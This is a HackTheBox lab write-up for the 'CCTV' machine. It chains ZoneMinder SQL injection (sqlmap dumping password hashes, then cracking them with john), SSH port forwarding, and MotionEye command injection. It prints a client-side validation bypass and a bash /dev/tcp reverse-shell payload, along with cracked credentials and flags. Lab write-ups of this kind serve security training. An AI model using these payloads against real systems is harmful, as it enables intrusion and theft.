← back to all writeups

CCTV

Linux Easy Pwned: 2026-06-03

Machine Info

FieldDetails
Machine NameCCTV
OSLinux
DifficultyEasy
StatusPwned

Tools Used


Summary

Exploited a blind SQL injection (CVE-2024-51482) in ZoneMinder 1.37.63 to extract and crack a bcrypt password hash, then escalated by injecting a reverse shell into MotionEye 0.43.1b4's config field (CVE-2025-60787) after bypassing client-side validation via the browser console.


Reconnaissance

Initial Scan (NMAP)

Initial recon reveals us that port 22 and port 80 are open. Port 80 is running an apache server.

──(kali㉿kali)-[~/HTB/CCTV/recon]
└─$ nmap -sC -sV -A 10.129.100.125 -oN scan.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-02 19:55 -0400
Nmap scan report for 10.129.100.125
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
80/tcp open  http    Apache httpd 2.4.58
|_http-title: Did not follow redirect to http://cctv.htb/
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   178.77 ms 10.10.14.1
2   178.82 ms 10.129.100.125

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.19 seconds

Open Ports:

PortServiceVersionNotes
22SSH
80ZoneMinderv1.37.63running on default credentials admin:admin
8765MotionEyev< 0.43.1b5Discovered after initial access that the service<br>is running internally.

Web Enumeration (if applicable)

Further enumeration and visiting the site manually reveals that the website is running the ZoneMinder app for staff login.

ZoneMinder is ==a free, open-source video management and surveillance software application designed primarily for Linux systems==.


CVEs / Vulnerabilities Identified

ZoneMinder v1.37.63 is affected by CVE-2024-51482, a critical boolean-based SQL injection vulnerability. The flaw resides in the web application's event handling logic (specifically in web/ajax/event.php), allowing low-privileged or unauthenticated attackers to execute arbitrary SQL commands.

CVEDescriptionSeverity
CVE-2024-51482# Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64Critical

Initial Foothold / Initial Access

Vulnerability: CVE-2024-51482

Using this proof of concept we find out that the url below is the vulnerable point. The function tid is vulnerable to SQL Injection.

http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1

By using sqlmap, we can automate the exploitation process by dumping the User table contents using the following command.

┌──(kali㉿kali)-[~/HTB/CCTV/sqlmap.log]
└─$ sqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' \
  --cookie="ZMSESSID=kpe92scv0lr9lc3vm75138ht32" \
  --batch \
  --threads=5 \
  --level=3 \
  --risk=2 \
  -D zm -T Users -C "Id,Username,Password" \
  --dump

---SNIP---
Database: zm
Table: Users
[3 entries]
+----+------------+--------------------------------------------------------------+
| Id | Username   | Password                                                     |
+----+------------+--------------------------------------------------------------+
| 1  | superadmin | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| 2  | mark       | $2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
| 3  | admin      | $2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m |
+-
---SNIP---

Post-Exploitation

System Enumeration

SQLMAP dumps the username and password for the user mark which we can decrypt using john.

──(kali㉿kali)-[~/HTB/CCTV]
└─$ john markhash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
opensesame       (?)     
1g 0:00:00:31 DONE (2026-06-02 21:43) 0.03180g/s 190.0p/s 190.0c/s 190.0C/s cristhian..tuyyo
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Credential Discovery

Decrypting the bcrypt password gives us the SSH login credentials for the user mark.

┌──(kali㉿kali)-[~/HTB/CCTV]
└─$ ssh mark@cctv.htb 
mark@cctv.htb's password: 
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-111-generic x86_64)
---SNIP---
mark@cctv:~$ ls

Credentials Found:

UsernamePasswordHashService
markopensesame$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.N/A

Lateral Movement

Further enumeration as mark reveals that the website have port 8765 open and running motion eye on it. We can reverse the ports to our server and listen to them locally.

Steps:

mark@cctv:~$ ss -tuln
Netid      State       Recv-Q      Send-Q           Local Address:Port        ---SNIP-- 
tcp        LISTEN      0           128                  127.0.0.1:8765                 0.0.0.0:*                    
---SNIP---


ssh -L 8765:127.0.0.1:8765 mark@cctv.htb

Going to the url http://127.0.0.1:8765 locally reveals that there's a motion eye service running on version 0.43.1b4 which is vulnerable to RCE via unsanitized motion config parameter. Credentials for admins can be found in the config file.

mark@cctv:~$ find / -path "*motioneye*" -name "*.conf" 2>/dev/null
/etc/motioneye/camera-1.conf
/etc/motioneye/motion.conf
/etc/motioneye/motioneye.conf
mark@cctv:~$ cat /etc/motioneye/motion.conf
# @admin_username admin
# @normal_username user
# @admin_password 989c5a8ee87a0e9521ec81a79187d162109282f0
# @lang en
# @enabled on
# @normal_password 
---SNIP---

Vulnerability: CVE-2025-60787

A command injection vulnerability in MotionEye allows attackers to achieve Remote Code Execution (RCE) by supplying malicious values in configuration fields exposed via the Web UI. (Reference: CVE-2025-60787)

configUiValid is a JavaScript function that runs in the browser before saving camera settings — it checks if the input fields contain valid characters, blocking anything that looks like shell syntax like $(). It only exists client-side meaning the server never validates the input itself, so overriding it lets anything through. It can be bypassed using the following command in website console.

configUiValid = function() { return true; };

Once bypassed, injecting a reverse shell payload in the image settings input box returns a root shell.

On kali start a listener

nc -lvnp 4444

Inject the python rev shell script into the input field.

$(python3 -c "import os;os.system('bash -c \"bash -i >& /dev/tcp/YOUR_KALI_IP/4444 0>&1\"')").%Y-%m-%d-%H-%M-%S
──(kali㉿kali)-[~/HTB/CCTV/svrfiles]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.100.125] 37174
bash: cannot set terminal process group (51117): Inappropriate ioctl for device
bash: no job control in this shell
root@cctv:/# whoami
root

User Flag

root@cctv:/home/sa_mark# cat user.txt
b47d816af8547f57167926be4d814eaa

Root Flag

root@cctv:~# cat root.txt                       
995afd6d3b5370ebc16400c0f5da53fe  

Trophy

https://labs.hackthebox.com/achievement/machine/1574945/847

Completed as part of HackTheBox practice in a legal, controlled environment.